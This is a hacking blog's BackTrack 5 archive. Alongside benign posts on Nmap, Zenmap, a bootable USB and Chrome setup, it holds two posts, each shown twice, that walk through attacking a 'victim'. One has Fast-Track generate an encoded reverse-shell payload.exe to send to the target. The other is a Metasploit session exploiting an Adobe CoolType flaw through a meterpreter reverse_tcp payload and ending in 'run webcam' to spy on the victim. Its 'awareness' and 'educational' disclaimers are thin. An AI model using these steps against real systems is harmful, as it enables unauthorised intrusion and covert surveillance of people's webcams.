Welcome to XnonymouX Blog

Showing posts with label Backtrack 5. Show all posts
Showing posts with label Backtrack 5. Show all posts

Friday, 18 October 2013

Nmap Scanning On Backtrack 5

By on 08:31


Learn Nmap Scanning On Backtrack 5 Environment 

Nmap is a program that scans all of the ports in your computer and check it  whether they are open or not.

So lets start the scanning process in Backtrack 5 Environment .



Ping Scan 


Range Scan 


Stealth Scan (-sS) 


OS SCAN : It showed us which Operating system is running by 
             the host.



TCP SCAN : This scan will show all the open tcp ports . 

ADVANTAGES :

  1. Speed
  2. Free to use 
  3. Don't need priviledges
DISADVANTAGES
  1. Easily Detectable and Filterable .


FIN SCAN 



NULL SCAN


UDP SCAN
In udp scanning we use udp scan instead of tcp scan .


Protocol Scan -sO <Target Ip >


IP PROTOCOL SCAN 

This Scan is used to find the ip protocols in use .

Regards xnonymoux.com

Zenmap Port Scanner

By on 08:30
Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use .

To start Zenmap on Backtrack 5 KDE  : click on Dragon>Internet >click Zenmap (shown below )




Now when you open Zenmap Port Scanner you will see a window like this :-



After this step you have to enter the ip4 address of  Target OS (here i use windows as a target system and its ip is 192.168.127.129.
 Now enter target ip address and then select type of scan listed below :-


Here i use intense scan and click on Scan Button.

After scanning the next window shows you all the ports which are open in windows XP .



This is how we scan the Target system for open ports on windows Operating System.
Regard,s Xnonymoux.com

Install backtrack via usb drive

By on 08:28

Install-Backtrack-from-usb-backtrack-logo


BackTrack is one of the best Linux distributions which is purely focused on penetration testing and is preloaded with several industry standard security and hacking tools like network analysers, wireless tools, fuzzers, crackers etc.. As like other Linux distributions BackTrack is also designed to boot and use from cd/dvd(called as live cd) but in some cases you may need to use BackTrack with your USB device. So in this post HPH will show you how to do it.
Even though BackTrack is designed to be used from live cd/dvd, it can also be used as a live USB drive. The process to make your live BackTrack USB drive is a piece of cake when you follow the 4 simple steps below.

Minimum Requirements:

  • USB device with 2+ GB space(4 GB is recommended)
  • BackTrack ISO file, If you don’t have the current latest version you can go download here.
  • A software application called Unetbootin, It is free an you can download it from here.
  • Five minutes of your precious time.

Steps to be followed:

Step #1: Plug-in your USB drive.
Step #2: Start the application Unetbootin.
Step #3: Now select the radio button DiskImage and click browse to select your BackTrack ISO.
Step #4: On the below select your USB drive letter and click OK to create bootable BackTrack USB.
That’s it your are done, you had successfully created your bootable USB BackTrack device. You can now boot and login to your BackTrack with the default username(root) password(toor).
Note: Make sure you select your USB as first boot device in your BIOS.
Regards xnonymoux.com

How to run Google Chrome in Backtrack

By on 08:26
Hey Friends i am back, sorry for posting late. Everyone wants to run google chrome in backtrack but it cannot be run in root user, but i have a way just follow all the steps:------>
1. Download google chrome from here.
2. After downloading chrome open directory file system/usr/bin and then find for google chrome and the open the file with gedit text editor.

3. Now at the end just paste this "--user-data-dir" without qoutes like in image.
4. Now save the file and now it will open and start enjoying the internet  - See more at:
Regard,s xnonymoux.com

Hacking a Computer using fastrack and backtrack

By on 08:24

Hacking a Computer using fastrack and backtrack

Hey friends i found a latest hack or way to hack into a computer which has a windows operating system.
Ok then lets start.Here are some requirments:-------->
1. Backtrack 
2. Ip address of victim.
3. Brain.
Now follow all the steps according to this post:--------------->
1. Open Fastrack by clicking on Applications-->Backtrack-->Exploitation tools-->Network exploitation tools-->Fast-Track-->fasttrack-interactive.


2. Now after opening fastrack select the option Payload generator by typing 8 and hitting enter.


3. Now after that type 1 to select Windows Shell Reverse_TCP and hit enter.


4. Now after that type 2 to select shikata_ga_nai and hit enter.


5. Now after that enter the ip address of victim and hit enter.
6. Now you have to scan ip address to get open ports refer to this article.


7. If you get any open ports then enter it like in image.
8. After that type 3 to select Executable and hit enter, this option will create a executable file in  directory filesystem-->pentest>exploit-->fasttrack-->payload.exe.
9. Now the send executable file to victim and when the victim open this file you will be connected to computer remotely.
Regards, xnonymoux.com

Hack victim webcam

By on 08:21




Our real purpose is to show just how easy it is, so you will take better awareness that it can be done, and  take security yourself.

Open Metasploit and run following commands:


msf>  show exploits


msf>use windows/browser/adobe_cooltype_sing


msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp


msf  exploit(adobe_cooltype_sing) > show options


Module options (exploit/windows/browser/adobe_cooltype_sing):


   Name                Current Setting       Required           Description
   ----                     ---------------               --------               -----------
   SRVHOST            0.0.0.0                   yes              The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT             8080                      yes              The local port to listen on.
   SSL                         false                         no                Negotiate SSL for incoming connections
   SSLCert                                                   no               Path to a custom SSL certificate (default is randomly generated)
   SSLVersion         SSL3                        no               Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                                              no               The URI to use for this exploit (default is random)



Payload options (windows/meterpreter/reverse_tcp):


   Name                  Current            Setting         Required  Description
   ----                    ---------------       --------              -----------
   EXITFUNC        process             yes               Exit technique: seh, thread, process, none
   LHOST                                             yes                The listen address
   LPORT                 4444                 yes               The listen port



Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf  exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) >exploit -j


Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.


msf  exploit(adobe_cooltype_sing) > session -i 1


meterpreter> run webcam


and you will get the webcam of victim. :)
Regards, xnonymoux.com

Friday, 26 April 2013

Hack victim webcam

By on 12:38

Hack Webcam





Our real purpose is to show just how easy it is, so you will take better awareness that it can be done, and  take security yourself.

Open Metasploit and run following commands:


msf>  show exploits


msf>use windows/browser/adobe_cooltype_sing


msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp


msf  exploit(adobe_cooltype_sing) > show options


Module options (exploit/windows/browser/adobe_cooltype_sing):


   Name                Current Setting       Required           Description
   ----                     ---------------               --------               -----------
   SRVHOST            0.0.0.0                   yes              The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT             8080                      yes              The local port to listen on.
   SSL                         false                         no                Negotiate SSL for incoming connections
   SSLCert                                                   no               Path to a custom SSL certificate (default is randomly generated)
   SSLVersion         SSL3                        no               Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                                              no               The URI to use for this exploit (default is random)



Payload options (windows/meterpreter/reverse_tcp):


   Name                  Current            Setting         Required  Description
   ----                    ---------------       --------              -----------
   EXITFUNC        process             yes               Exit technique: seh, thread, process, none
   LHOST                                             yes                The listen address
   LPORT                 4444                 yes               The listen port



Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf  exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) >exploit -j


Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.


msf  exploit(adobe_cooltype_sing) > session -i 1


meterpreter> run webcam


and you will get the webcam of victim. :)

Friday, 22 February 2013

Hacking a Computer using fastrack and backtrack

By on 01:42

Hacking a Computer using fastrack and backtrack

Hey friends i found a latest hack or way to hack into a computer which has a windows operating system.
Ok then lets start.Here are some requirments:-------->
1. Backtrack 
2. Ip address of victim.
3. Brain.
Now follow all the steps according to this post:--------------->
1. Open Fastrack by clicking on Applications-->Backtrack-->Exploitation tools-->Network exploitation tools-->Fast-Track-->fasttrack-interactive.


2. Now after opening fastrack select the option Payload generator by typing 8 and hitting enter.


3. Now after that type 1 to select Windows Shell Reverse_TCP and hit enter.


4. Now after that type 2 to select shikata_ga_nai and hit enter.


5. Now after that enter the ip address of victim and hit enter.
6. Now you have to scan ip address to get open ports refer to this article.


7. If you get any open ports then enter it like in image.
8. After that type 3 to select Executable and hit enter, this option will create a executable file in  directory filesystem-->pentest>exploit-->fasttrack-->payload.exe.
9. Now the send executable file to victim and when the victim open this file you will be connected to computer remotely. 


Note :--- Its for educational purpose

Monday, 7 January 2013

How to run Google Chrome in Backtrack

By on 02:13
Hey Friends i am back, sorry for posting late. Everyone wants to run google chrome in backtrack but it cannot be run in root user, but i have a way just follow all the steps:------>
1. Download google chrome from here.
2. After downloading chrome open directory file system/usr/bin and then find for google chrome and the open the file with gedit text editor.

3. Now at the end just paste this "--user-data-dir" without qoutes like in image.
4. Now save the file and now it will open and start enjoying the internet 

Monday, 19 November 2012

install backtrack via usb drive

By on 07:00

Install-Backtrack-from-usb-backtrack-logo


BackTrack is one of the best Linux distributions which is purely focused on penetration testing and is preloaded with several industry standard security and hacking tools like network analysers, wireless tools, fuzzers, crackers etc.. As like other Linux distributions BackTrack is also designed to boot and use from cd/dvd(called as live cd) but in some cases you may need to use BackTrack with your USB device. So in this post HPH will show you how to do it.
Even though BackTrack is designed to be used from live cd/dvd, it can also be used as a live USB drive. The process to make your live BackTrack USB drive is a piece of cake when you follow the 4 simple steps below.

Minimum Requirements:

  • USB device with 2+ GB space(4 GB is recommended)
  • BackTrack ISO file, If you don’t have the current latest version you can go download here.
  • A software application called Unetbootin, It is free an you can download it from here.
  • Five minutes of your precious time.

Steps to be followed:

Step #1: Plug-in your USB drive.
Step #2: Start the application Unetbootin.
Step #3: Now select the radio button DiskImage and click browse to select your BackTrack ISO.
Step #4: On the below select your USB drive letter and click OK to create bootable BackTrack USB.
That’s it your are done, you had successfully created your bootable USB BackTrack device. You can now boot and login to your BackTrack with the default username(root) password(toor).
Note: Make sure you select your USB as first boot device in your BIOS.

Monday, 8 October 2012

Zenmap Port Scanner

By on 22:10
Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use .

To start Zenmap on Backtrack 5 KDE  : click on Dragon>Internet >click Zenmap (shown below )




Now when you open Zenmap Port Scanner you will see a window like this :-



After this step you have to enter the ip4 address of  Target OS (here i use windows as a target system and its ip is 192.168.127.129.
 Now enter target ip address and then select type of scan listed below :-


Here i use intense scan and click on Scan Button.

After scanning the next window shows you all the ports which are open in windows XP .



This is how we scan the Target system for open ports on windows Operating System.